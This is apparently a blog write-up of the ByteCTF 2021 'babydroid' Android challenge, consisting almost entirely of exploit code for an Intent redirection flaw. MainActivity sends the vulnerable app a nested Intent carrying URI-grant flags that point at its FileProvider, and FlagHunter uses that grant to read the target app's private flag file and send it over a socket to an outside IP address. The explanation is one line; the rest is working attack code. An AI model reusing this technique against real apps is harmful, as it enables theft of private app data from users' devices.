ha1vk's blog
0%

bytectf2021_babydroid

发表于 分类于

存在Intent重定向漏洞

MainActivity.java

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
package com.bytectf.pwnbabydroid;
import android.app.Activity;
import android.content.ContentValues;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.provider.MediaStore;
import android.widget.Toast;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;

public class MainActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent extra = new Intent();
        extra.setFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION | Intent.FLAG_GRANT_PREFIX_URI_PERMISSION | Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
        extra.setClassName(getPackageName(), "com.bytectf.pwnbabydroid.FlagHunter"); extra.setData(Uri.parse("content://androidx.core.content.FileProvider/"));
        Intent intent = new Intent();
        intent.setClassName("com.bytectf.babydroid", "com.bytectf.babydroid.Vulnerable");
        intent.putExtra("intent", extra);
        intent.setAction("com.bytectf.TEST");
        startActivity(intent);
    }
}

FlagHunter.java

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
package com.bytectf.pwnbabydroid;
import android.app.Activity;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import android.widget.TextView;
import android.widget.Toast;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.net.SocketAddress;
public class FlagHunter extends Activity {
    @Override
    public void onCreate(Bundle bundle) {
        super.onCreate(bundle);
        try {
            String file = "/root/data/data/com.bytectf.babydroid/files/flag";
            InputStream is = getContentResolver().openInputStream(Uri.parse(getIntent().getDataString() + file));
            BufferedReader br = new BufferedReader(new InputStreamReader(is));
            StringBuilder sb = new StringBuilder();
            String line;
            while ((line = br.readLine()) != null) {
                sb.append(line);
            }
            is.close();
            br.close();
            String flag = sb.toString();
            Log.e("FlagHunter", flag);
            new Thread(new Runnable() {
                @Override
                public void run() {
                    try {
                        if (true) {
                            Socket sk = new Socket();
                            SocketAddress address = new InetSocketAddress("192.3.81.102", 6666);
                            sk.connect(address, 5000);
                            sk.setTcpNoDelay(true);
                            sk.setKeepAlive(true);
                            OutputStream os = sk.getOutputStream();
                            os.write(flag.getBytes());
                            os.flush();
                            os.close();
                            sk.close();
                            Thread.sleep(1000);
                        }
                    } catch (Exception e) {
                        Log.e("FlagHunter_Err",e.toString());
                    }
                }
            }).start();
            //os.close();
        } catch (Exception e) {
            Log.e("FlagHunter_Err",e.toString());
        }
    }
}

AndroidManifest.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.bytectf.pwnbabydroid">
    <uses-permission android:name="android.permission.INTERNET" />
    <application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:roundIcon="@mipmap/ic_launcher_round"
        android:supportsRtl="true" >
        <activity
            android:name=".MainActivity"
            android:exported="true"
            android:label="@string/title_activity_main">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity android:name="com.bytectf.pwnbabydroid.FlagHunter" android:exported="true" />
    </application>
</manifest>